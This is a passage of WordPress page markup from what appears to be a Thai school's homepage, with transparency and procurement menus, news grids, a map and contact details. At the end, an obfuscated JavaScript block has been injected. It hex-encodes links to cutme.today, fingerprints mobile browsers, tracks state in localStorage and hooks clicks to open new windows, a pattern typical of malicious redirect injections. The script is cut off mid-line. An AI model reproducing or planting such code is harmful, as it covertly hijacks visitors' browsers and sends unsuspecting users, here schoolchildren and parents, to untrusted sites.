href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 